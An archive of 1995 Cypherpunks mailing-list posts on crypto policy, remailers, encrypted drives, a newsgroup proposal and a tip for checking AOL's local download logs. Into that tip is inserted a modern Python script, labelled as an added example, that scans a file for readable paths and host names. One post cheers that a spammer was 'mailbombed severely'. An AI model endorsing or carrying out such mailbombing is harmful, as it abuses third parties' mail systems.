On Fri, 15 Sep 1995, Peter Trei wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
>      Think about it. Which future would you rather see:
> 
> 1. Lots of people demanding strong unescrowed crypto for what you  
>    consider rather peripheral and politically unaware reasons, which
>    you have educated them in.
> 
> 2. Unescrowed crypto banned, with those who promote considered
>    aiders and abettors of the four horsemen, (but boy are they 
>    ideologically pure!).


3. Unescrowed crypto banned, with advanced stego, panic passwords, 
stealth PGP, incorporated remailers all across international borders 
making offenders impossible to identify or catch.

Given the degree to which I believe 1. unlikely in the numbers required 
to avoid the unescrowed encryption ban, I believe the goal is to 
propagate crypto far enough to at least have a salient "underground" 
participants.

Some months ago I called for advanced stego and stealth PGP as well as 
larger keys in the event we all had to go "into the crypto closet" for a 
time.

I call for them again.

> 
> Peter Trei
> 
> I probably won't see any responses till Monday. I'm going for a 
> weekend at a resort on Lake Winnipesaukee. If you need me, I'll be
> in the hot tub. :-) 
> 
>      
> 
> 
> 
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMFmmK1QxhKXe9s8VAQE+tgP+NcKdGvBeJpa8AHGr/RhKCHudZP2qmRNP
> J699UCCvN006ywIjurjuis48VPj26uxBkcRbeuzNxGlKmZqXIkS0vEcFjrrZhBsK
> V9dLFFGTZ6JG3nK++mleW1wQB/F0azXXvXKJWa6R+Tnj1oo2ADUxGNQMs9IVmgR3
> zsyK3fej+IQ=
> =YqDH
> -----END PGP SIGNATURE-----
> 
> Peter Trei
> Senior Software Engineer
> Purveyor Development Team                                
> Process Software Corporation
> http://www.process.com
> trei@process.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sat, 16 Sep 95 09:35:48 PDT
To: John Hemming CEO MarketNet <JohnHemming@mkn.co.uk>
Subject: Re: More on ECheques
In-Reply-To: <v02120d00ac805e5cf474@[199.0.65.105]>
Message-ID: <Pine.SUN.3.91.950916123607.25537G-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 16 Sep 1995, John Hemming CEO MarketNet wrote:

> 1. I was not suggesting that you put your real bank account number
>     in the program.  A test number is perfectly adequate.
> 
> 2. In the UK people advertise their Bank Account numbers so that people
>     can pay them.
> 
> 3. If you do use your real bank account number,  I will not pay you
>     anything nonetheless.

(But I will clone some checks and drain your account quickly).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sat, 16 Sep 95 09:39:41 PDT
To: Dar Scott <dsc@swcp.com>
Subject: Re: (Noise) X-Files anarchist
In-Reply-To: <v01510100ac80a19afbbc@[198.59.115.139]>
Message-ID: <Pine.SUN.3.91.950916123927.25537I-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 16 Sep 1995, Dar Scott wrote:

> I hardly watch TV ...blah, blah..., but I saw X-files last night.  A very
> minor character was a cryptohacker who--to his surprise--brute-forced a
> military key for some files.  He was described as an anarchist.
> 
> To _my_ surprise, this anarchist was not associated with violence or
> lunatic ravings.  He was shown as reading a book entitled something like
> Survey of Modern Conspiracy Theories.

"50 Greatest Conspiracies"

But I never watch T.V.

> 
> I think the character was killed, but I may have missed something.
> 
> Dar
> 
> ===========================================================
> Dar Scott               Home phone: +1 505 299 9497
> 
> Dar Scott Consulting         Voice: +1 505 299 5790
> 8637 Horacio Place NE        Email: darscott@aol.com
> Albuquerque, NM  87111              dsc@swcp.com
>                                Fax: +1 505 898 6525
> http://www.swcp.com/~correspo/DSC/DarScott.html
> ===========================================================
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sat, 16 Sep 95 13:16:49 PDT
To: cypherpunks@toad.com
Subject: C-punks, marketing for the masses
Message-ID: <199509162008.AA03860@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

No disrespect intended, but I think that the various "let's sanitize
the Cypherpunk message for mass acceptance" marketing/soundbite 
proposals are pointless. Cypherpunks is a mailing list, not a political
party (or a platform). 

- From my perspective, the organizing meme for the list is not "strong
crypto is really important, so let's write some and lobby our lawmakers
to make sure it stays legal" but "strong crypto is here and is changing
the dynamics of force, politics, and power, so let's see what we can 
do with it."

(And no, I don't think it's important to spread that "meme" (a term
I use with some trepidation) around to get "market share" for it.
Ideas are not football teams nor initiative proposals.)

I appreciate and support and have participated in various write-yer-
legislator activities. They're useful short-term. But if Tim May and
Duncan Frissell and the other list members who've dared to make predictions
about the impact of crypto on government and economics are correct,
what the government and the legislators want doesn't matter. If they're
wrong, what we want doesn't matter. 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFsujH3YhjZY3fMNAQHfogP9HMEe6/N7B0q4cov8knythwuqha4yFmsR
Yfxtp8/ukXhfJlJQ5Mb40AYWcNwWGXmzd8J2KzrYBntKN60SZnd/StRQfHs6rtre
hLHZGss4bR1c9w0+Jsr3TKD5UQe2up2cEuY9u6qN6QyVK9h9QtfSHpJqb3bAZlla
fA3GMtB2qlc=
=Phdj
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 16 Sep 95 13:13:45 PDT
To: cypherpunks@toad.com
Subject: Re: SecureDrive News - Win95 yes, Iomega zip drive no
Message-ID: <199509162013.NAA06723@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:33 AM 9/16/95 PDT, you wrote:

>I'm sorry to report that SecureDrive does not support the Iomega ZIP
>drive.  I believe that's because the TSR driver supplied with the
>hardware does not support a DiskBIOS interface.
>
>I had thought that Secure Device, another real-time encryption system,
>would support this drive, since it works through a device driver
>mapped to a dos file.  But an actual trial proved otherwise.  The
>problem is that the DOS file must be present when the CONFIG.SYS
>DEVICE= statement for the SECDEV.SYS is processed. But the zip drive
>driver is a TSR that doesn't get loaded until after all DEVICE
>statements have been processed.  There's no particular reason that
>Iomega couldn't have written their driver as an MSDOS device driver
>rather than a TSR, in which case SecureDevice would probably work, but
>they didn't, so it doesn't.

There is a Win95 driver for the Zip drive that does not a TSR.  It is a
parallel to SCSI driver that is added through the "add hardware" control
panel.  I am not certain as to the order that the drivers load.  I will have
to test it.  (The driver was released on the 9th of this month with little
or no instructions.)

Having encrypted Zip drives would be VERY useful.  I will see if Borland's
latest update for the C++ compiler has any additional information as to some
of the driver interface issues (I doubt it, but it is worth a try).  It is
supposed to arrive "any day now", but it is backordered so who knows when I
will get it.
I may have to spend the bucks and get the Microsoft development disc
subscription again.  It will most likely have the information needed to
convert the drivers to something Win95 will understand.

|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sat, 16 Sep 95 13:17:59 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful.
Message-ID: <199509162015.AA03916@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Black Unicorn writes:
> Some months ago I called for advanced stego and stealth PGP as well as 
> larger keys in the event we all had to go "into the crypto closet" for a 
> time.

> I call for them again.

I know of three ways to get software:

1. Write it yourself.
2. Pay someone else to write it.
3. Find software someone else wrote that meets your needs.

If (3) isn't working, perhaps you should try (1) or (2). 

(I've been "calling for" a big house with a hot tub for years now.
Still no progress. I'll let you know if it works out.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFswPX3YhjZY3fMNAQHatwP/ZJKuNEDRPdCldyvshGkG/w/io+37zx3m
DyJ4h1+OicxYCtKbolXYVcX8C4d1j7hXY2sesepcDvYYyy+butdQ+/2tw3u0FW1j
WpfCGURpypBVb5T7QlL21Qv39cBIu9mJxkasPkQSeSnrC24eGtoItmZzrIRZgJyj
Dj2FOIfxiFY=
=5DwJ
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 16 Sep 95 10:34:22 PDT
To: cypherpunks@toad.com
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
In-Reply-To: <ac8044c413021004e871@[205.199.118.202]>
Message-ID: <9509161733.AA03680@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Should there be an "alt.cypherpunks" type of newsgroup instead of this
>mailing list?

Bad idea, it would simply mean that every kook on USEnet would add 
alt.cypherpunks onto the crossposting line. We would have black helicopters, gun 
loons, Waco Wako's, Loonytarians and Turkish government propaganda spamming 
forever.

I think we should wait a while. I see USEnet going through some very dramatic 
changes quite soon, the infrastructure of newsgroups is now insufficient to 
support the cognitive complexity of discourse amongst so many people. I expect 
more structured discourse models such as the lightweight link semantics of 
Openmeeting and Wit to percolate in, NCSA already have a version of hypernews 
with these features.

One thought to ponder on. There is no real difference in terms of resources 
required between a mailing list and an archive of a mailing list at a Web site. 
The latter does avoid a large number of unnecessary dispatches however.

	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 16 Sep 95 13:41:36 PDT
To: cypherpunks@toad.com
Subject: Re: cypherpunks as a newsgroup
Message-ID: <199509162041.NAA10780@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:40 PM 9/16/95 -0400, Ian wrote:

>I've been very impressed with the signal/noise ratio on this list.
>In fact, people often put [NOISE] in the subject line to flag trivial
>content.  This ratio will certainly go down if we go to a newsgroup.

I have a group of friends who get forwarded the "best" of the Cypherpunks
list.  The signal to noise ratio is high enough that I have to be careful
how much I forward lest I get complaints at the volume of what I forward.
Turning this into an alt group would destroy that.

>One of the main benefits of Usenet is that anyone can _post_.
>One of the main detriments is that _anyone_ can post.

How true.
|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 16 Sep 95 13:58:21 PDT
To: cypherpunks@toad.com
Subject: AOL monitoring
Message-ID: <199509162055.NAA22204@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


hello, apparently the recent FBI sting happened with the cooperation
of AOL, which allowed the FBI to monitor downloads..

here's some info to test if you are being monitored on AOL

------- Forwarded Message

Date: Sat, 16 Sep 1995 14:47:38 -0400
To: snet-l@world.std.com
From: Charles Zeps <czeps@icis.on.ca>
Subject: How to find out if you are sniffed at AOL  


>      America Online Opens Private E-mail to Federal Sting
>              (c) 1995 N.Y. Times News Service
>
>(14 Sept. 1995 )  Responding to court orders related to a
>nationwide crackdown on the electronic transmission of child pornography,
>America  Online, the nation's largest information service, gave law
>enforcement agents access to the private electronic mailboxes of an unknown
>number of its subscribers, company officials confirmed Thursday.

From: Eric Muetterties <ericm3@ix.netcom.com>

   All you America online users would be wise to check out your
software...(WINDOWS)

    Use a file viewer that will allow you to view in hexadecimal. Or use
the DOSSHELL.EXE program in your DOS directory and use the menu to VIEW
file contents
    
    Find your Aonline directory and find the directory marked IDB.

    This should have two files marked with your screen name and a
suffix of either .arh or .pnd  (eg.  ericmuette.arh)

    With the file loaded in the viewer you will see the hex dump of
these files. In the side pane will be the equivalent ASCII of the
hexadecimal dump (in layman's terms... if there is text you will
recognize it...)

    Use PAGE DOWN to move down through the files.... soon you will
recognize the first files you downloaded and references to where you
were on the internet and what directory you saved the file to.

    Make these files READ ONLY with the file attributes menu in your
file manager and they can not use this facility../

    You will get an error message when you first start up ("XFER ERROR
- - - could not create database") Click on "OK" and program will continue.

    Then when program gives you messages when you try to save to disk
or download something just click on "IGNORE" till program continues
(usually 3 times).

    When they realize everyone is defeating this they can easily come
up with a more covert way of tracking you but in the meantime...
    ... better to change to another provider...

    You will be amazed at your friends' expressions when you get on
their computer and tell them what they have downloaded.

    If you view the files in the TOOLS directory , at the end of the
files you will find the internal names for these programs such as
"Internal DAtabase" , ETC.  !!!  Have fun...

    Big Bro is here in a BIG WAY... MIND YOUR P's and Q's on the NET
!!!

    E. Muetterties

    If you can't figure out how to do this email me with what is in
your "IDB" directory and I'll tell you which files to view.

    ericm3@ix.netcom.com


Linda Thompson
American Justice Federation
Home of AEN News and "Waco, the Big Lie" "America Under Siege"
3850 S. Emerson Ave.
Indianapolis, IN  46203
Telephone:  (317) 780-5200
Fax:  (317) 780-5209
Internet:  lindat@iquest.net

"When even one American -- who has done nothing wrong -- is forced by fear
to shut his mind and close his mouth, then all Americans are in peril."
Harry Truman
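
A present-day way to run the inspection the forwarded post describes, scanning a client's local data file for readable paths and host names, as an added example that is not part of the original message. The sample bytes are constructed, the real layout of the .arh/.pnd files is not described on the page, and the function names are this example's own.

```python
"""Scan a binary client data file for readable traces of download activity."""
import re
from typing import List, NamedTuple

MIN_RUN = 4  # shorter printable runs are mostly binary noise

# Runs of printable ASCII: the text a hex viewer shows in its side pane.
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_RUN)

# Heuristic classifiers, tried in order; the first match wins.
# The hostname pattern also matches a bare NAME.EXT file name, so treat
# its hits as "dotted names" that need a human look.
CLASSIFIERS = [
    ("local_path", re.compile(r"[A-Za-z]:\\[\x21-\x7e]+")),
    ("remote_path", re.compile(r"/[\w.~-]+(?:/[\w.~-]+)+")),
    ("hostname", re.compile(r"\b(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}\b")),
]


class Hit(NamedTuple):
    offset: int  # byte offset of the match inside the file
    kind: str    # which classifier matched
    text: str    # the readable string itself


def audit(data: bytes) -> List[Hit]:
    """Return every printable run that looks like a path or a host name."""
    hits = []
    for run in PRINTABLE_RUN.finditer(data):
        text = run.group().decode("ascii")
        for kind, pattern in CLASSIFIERS:
            match = pattern.search(text)
            if match:
                hits.append(Hit(run.start() + match.start(), kind, match.group()))
                break
    return hits


def audit_file(path: str) -> List[Hit]:
    """Read a file in binary mode (it is never modified) and audit it."""
    with open(path, "rb") as handle:
        return audit(handle.read())


# Constructed sample: binary filler around the kinds of strings the post
# says become visible (where a file came from and where it was saved).
SAMPLE = (
    b"\x00\x01IDB\x00\x10\x00\x00"
    b"ftp.example.org\x00\x03\x00"
    b"/pub/images/SAMPLE1.GIF\x00\xff\xfe"
    b"C:\\AOL\\DOWNLOAD\\SAMPLE1.GIF\x00\x00\x07"
    b"\x02ab\x00"
    b"C:\\AOL\\DOWNLOAD\\NOTES.TXT\x00"
)

if __name__ == "__main__":
    for hit in audit(SAMPLE):
        print(f"{hit.offset:#06x}  {hit.kind:<11}  {hit.text}")
```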








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Sat, 16 Sep 95 11:01:54 PDT
To: cypherpunks@toad.com
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: <v0153050aac80bc08da47@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:33 PM 9/16/95, hallam@w3.org wrote:
>>Should there be an "alt.cypherpunks" type of newsgroup instead of this
>>mailing list?
>
>Bad idea, it would simply mean that every kook on USEnet would add
>alt.cypherpunks onto the crossposting line. We would have black
>helicopters, gun loons, Waco Wako's, Loonytarians and Turkish government
>propaganda spamming forever.

A lot of people on the list seem to see it as a corporation that has to
show X% growth for its shareholders every year.

The list is a healthy size, and there are a lot of very bright people on it
with very good ideas (a lot of the best people and best ideas in the field,
in fact).  Traffic is pretty high, too.  I don't see any reason to try to
increase our market share just for the sake of it.

Even worse, it seems to me that what some people are suggesting (and this
comes up at least once a year) will lead to increased entropy, with us, the
EFF, EPIC, etc., etc., blending into one amorphous lobbying blob.  This is
a unique list of people doing VERY IMPORTANT work that no one else is
doing.  To tell you the truth, I think that to date cypherpunks have left a
much greater mark on the world than the EFF and all of the others.  No
question about it.

Again (as others have said over and over), if people are concerned about
better lobbying, this isn't the place for it--and the good news for you is
that there are plenty of other groups with the resources, staff, and
mission to do it.  So what's the problem?

If you're embarrassed mentioning our name to your straight friends, c'est
la vie.  I wish I could show my boss my brilliant article in the new issue
of ANARCHY, but I can't.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 16 Sep 95 14:25:54 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Re: SecureDrive News - Win95 yes, Iomega zip drive no
Message-ID: <199509162125.OAA17362@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:56 PM 9/16/95 -0400, darky wrote:

>	Have you tried an 'INSTALL=' line in the CONFIG.SYS to load
>the drive's TSR first?  INSTALL is a rarely-documented feature for the
>CONFIG.SYS to load a TSR during its processing.  I believe it also
>saves memory by not loading some sort of header into memory (DOS
>PSP maybe?), which may also cause a problem.  Can't hurt to try
>though, eh?

After thinking about this (and drinking more coffee) I realized that he is
loading the GUEST.EXE driver.  This is not the best way to get the Zip drive
to work.  (It is meant as a temporary fix.)  There is actually a set of
drivers that can be installed in the config.sys file.  (Check the
documentation for installing the ASPI drivers and install the PPA3 driver as
the first of the three.)  This is poorly documented by Iomega, but it works.


|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Sat, 16 Sep 95 11:29:28 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
In-Reply-To: <ac8044c413021004e871@[205.199.118.202]>
Message-ID: <Pine.PMDF.3.91.950916142734.539071276B-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Newsgroups get more spam.  I'm getting ads from "janet.dove" for magazines
via this list as it is...something to do with a gateway to a newsgroup I
fear.  If it's a newsgroup, I'll probably read it less.  "Life is too
short for spam when you can have a Pommard."

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (soon to move to its real home): http://www.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Sat, 16 Sep 95 12:30:17 PDT
To: cypherpunks@toad.com
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: <9509161930.AA08524@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



Although Tim is quite happy with Eudora's (or whatever it is)
email handling techniques, I would also prefer a way in
which to use my Usenet tools on the cypherpunks list.

BUT

I think that making it a newsgroup opens up the volume to
a level far beyond what it is now.  It will also result
in a far larger level of "noise" due mostly to cross-posts.

My plan is to gate cypherpunks to a local newsgroup
(local to my machine only) and read it that way.  Is
it more work for me that way? - yes, but I'd prefer to
do the extra work required than lose what this group
has as a mailing list.

Now - if someone wants to start a separate alt.cypherpunks
group, but *NOT* gateway this list to it - be my guest.
People can then vote with their feet which is the better
"medium" or transport method.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Sat, 16 Sep 95 12:47:13 PDT
To: cypherpunks@toad.com
Subject: Re: alt.cypherpunks
Message-ID: <v01510100ac80e603415c@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Hi all,
>
>My vote is to let the folks on usenet sink in their own quagmire of
>ignorance about what we do. This list is no secret. If somebody wants to
>get into the 'game' let them bloody well subscribe.
>
>Ta ta.

I should mention that the literate programming mailing list somehow died
when it moved to comp.programming.literate. Something about the nature of
usenet took the life out of it.

Besides, does anyone want the inevitable "How can I get my Win95 PC to run
doom?" questions?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMFs3bHIf3YegbdiBAQEu7AJWLFim1gdvzCy1+WpPzr8lxcDMmYcxIOyH
3XqR+7YSfEoPEW23Gq73BBU658leNKspGwJQ1a+7qnFsDRL1+TEe/V4meOwfyoWq
aNcn
=YLv5
-----END PGP SIGNATURE-----

Dietrich Kappe | Red Planet    http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "syrinx@c2.org (Syrinx Anonymous Remailer)" <syrinx@c2.org>
Date: Sat, 16 Sep 95 15:11:20 PDT
To: jpunix.com.remailer-operators@c2.org
Subject: RE: Commercial Mixmaster
Message-ID: <199509162201.PAA14969@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Rich Salz <rsalz@nntp.com> wrote:

> >No, I'm not accusing Lance.  But if he no longer has the time to
> >support Mixmaster, then perhaps some other crypto-friendly group
> >should take over the task and keep it an OPEN system, with source
> >code available.  In fact, even freezing Mixmaster as is would be
> >preferable to "improvements" that people don't/can't trust.
>
> This doesn't make sense.
>
> Someone wants to commercialize Mixmaster.  You don't know who it is,
> but since you can't see how to make money doing this, you suspect
> their motives.  Yet on the other hand, you think they will be so
> successful that enough people will buy binary-only servers such that
> backdoors are a real threat, perhaps by forcing people to upgrade
> or otherwise breaking interoperability with the current free-source
> remailer network.
>
> You can't have it both ways.

Of course not, but it only has to *LOOK* that way.  What if, let's
say, that this new "commercial" venture offers their "new, improved"
version FREE for individual and non-profit use, much like Netscape
is now offered, while supposedly working on the "commercial"
development of the product.  Now you've got a free product in the
hands of end-users, plus it's compiled to support DOS, Win 3.1,
Win95, Mac platforms, etc., as well as the current Unix.  It doesn't
matter if a commercial market is EVER developed, just so long as you
provide a suitable "cover" motive for giving it away.  Of course,
source code is still not provided, since that would supposedly give
competitors (for this supposedly developing commercial market)
knowledge of the proprietary improvements.

The idea would be to take a standardized product and "steal" market
share from the various PGP-chaining schemes, while doing it in such
a way to provide a back door of participating TLAs. Mixmaster is a
superior product to the other schemes, but it suffers from lack of
user-friendliness and availability on commonly-used platforms.

Think about this:  if you were a TLA, can you think of a more
cost-effective solution for keeping tabs on the increasingly
THREATENING (to them) growth of anonymous e-mail?  IOW, invest a few
million to get a Trojan Horse crypto product into people's hands that
they THINK is secure, and thus trust.  Do you think they could use
brute force to crack large quantities of IDEA or 3DES encrypted
traffic for less money?  If they can't crack PGP, then get people to
switch to something they *THINK* is "more secure".

> But even if you could, there's a solution. :)  Download the source
> and start releasing "blender", a free-source anonymous remail system
> that is upwardly compatible, *and based on* the current Mixmaster.

I think that's what I suggested, isn't it?  Hopefully it will be a
foreign (ITAR-exempt) individual or group.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: keelings@wu1.wl.aecl.ca (S. Keeling)
Date: Sat, 16 Sep 95 13:12:22 PDT
To: cypherpunks@toad.com
Subject: Re: WAS_tem (fwd)
Message-ID: <9509162012.AA29482@wu1.wl.aecl.ca>
MIME-Version: 1.0
Content-Type: text/plain


Incoming from Rev. Ben:
> 
> On Thu, 14 Sep 1995, James A. Donald wrote:
> 
> > If you draw a picture using paintbrush of an underage person engaging
> > in sexual conduct, you are in violation of this proposed legislation.
> 
> Doesn't that directly contradict the stated purpose of existing child 
[snip]
> 
> Do the lawyers on the list want to pipe up?

	On cypherpunks?!?  Whatever for?  I imagine there's already a
rousing discussion going on about this somewhere in AOL.  Take it there.

-- 

 "Remember, obsolescence (Win95) isn't an accident;  it's an art form!" 
   keelings@wu1.wl.aecl.ca       s. keeling,   aecl - whiteshell labs



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Sat, 16 Sep 95 15:04:33 PDT
To: cypherpunks@toad.com
Subject: All Online Lusers, cryptoTCP
Message-ID: <199509162112.PAA02177@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Well, I read the tip on how to find out if AOL is checking
what I download. The good news is, they're DEFINITELY NOT. ;)

Anybody have a link to the encrypted TCP driver? I remember
the original announcement didn't give a link.

Don

"So what you're saying is, if too many people are breaking into my house,
I should leave the key under the doormat so the police can chase the
crooks???" 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMFs9VMLa+QKZS485AQFXuQL7Bd/u6MznUCYTMdKbIT4P+6IVj+j4IXjO
CL4kg2tGefOKq5RD543ThP4PQx1HghIU1dHTg5ZeF9c52JE0owNFuRa2GgfDld5s
SzZrlhmff0kqMdn6QyV4+mCICmiX9BnS
=NsVn
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sat, 16 Sep 95 12:17:20 PDT
To: cypherpunks@toad.com
Subject: (noise) Re: SPAM bait
Message-ID: <199509161913.PAA55049@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


nobody@alpha.c2.org (Anonymous) wrote:

<snip>
>
>Don't worry, "Janet Dove", or actually sanghi3@grfn.org got mailbombed
>severely for this one.  I'm just glad he doesn't know how to use remailers.

Good going, Anonymous. What I don't understand about inappropriate
SPAMs like that one (or telephone ads) is; what's the business
incentive to do it? I assume that no Cypherpunk has subscribed to
"Janet's" magazines, and I know that no Ray has _EVER_ spent
money over a telephone unless we initiated the call, yet *still*
we get unwanted calls every once-in-a-while. WHY? [Please respond
privately to liberty@gate.net ]
JMR





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sat, 16 Sep 95 12:22:24 PDT
To: cypherpunks@toad.com
Subject: "Hackers"-- brief review and anecdote...
Message-ID: <ac80d4a51e02100402b9@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



I saw "Hackers" yesterday. It's not bad and its political sensibility is
very cyberpunk. The ad campaign even uses the tag line, "Their only crime
is curiosity." Given that a major studio is spending beaucoup bucks to
spread this tag line, I think it is safe to say that cyber issues are very
mainstream by now. Still edgy enough to be exciting to many, but definitely
comprehensible.

The characters are just a bit too cool for school and some of the notes
ring false. The evil one, a corporate computer security officer, would have
been better served by someone who is not as laughable as Fisher Stevens. I
could probably hit the escape key on my computer here and he would cringe.
Jeremy Irons or Klaus Maria Brandauer would have been more inspired. But
they can't skateboard.

I also stopped by the Department of Motor Vehicles yesterday. The lines
were long and I soon found myself grousing along with the guy behind me. He
was about 60 years old and not part of the cyberpunk generation in any way.
After I said some libertarian thing by wondering aloud about why we even
needed to have such a huge bureaucracy centered around cars, he said,
"Yeah. Have you seen all the land they have down in Fort Meade? Beautiful
land and they just spend their time down there spying on the people." He
lumped the NSA in with the DMV. To him, it was just one big bureaucracy.

-Peter







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Childers James <ic58@jove.acs.unt.edu>
Date: Sat, 16 Sep 95 13:42:18 PDT
To: cypherpunks@toad.com
Subject: Newbie Crypto question: MOD?
Message-ID: <Pine.SOL.3.91.950916153657.18178A-100000@jove.acs.unt.edu>
MIME-Version: 1.0
Content-Type: text/plain



Ok folks, I recently received "Applied Cryptography" as a gift, and just 
have one question: How does the MOD function work in crypto functions? It 
seems to work differently than what I've seen before, i.e.: C/C++ MOD. I 
also didn't see anything in TCM's FAQ...

If this is considered noise, I apologize in advance.


"Freedom is meaningless unless  | ic58@jove.acs.unt.edu - James Childers
 you can give to those with whom| No man's freedom is safe
 you disagree." - Jefferson     |    while Congress is in session
        EA 73 53 12 4E 08 27 6C   21 64 28 51 92 0E 7C F7





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Sat, 16 Sep 95 12:40:45 PDT
To: cypherpunks@toad.com
Subject: cypherpunks as a newsgroup
In-Reply-To: <14439.9509161026@exe.dcs.exeter.ac.uk>
Message-ID: <43f97c$64n@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <PysiBD7w165w@bwalk.dm.com>,
Dr. Dimitri Vulis <dlv@bwalk.dm.com> wrote:
>aba@dcs.exeter.ac.uk writes:
>> One thing I have been thinking would be nice would be a USENET
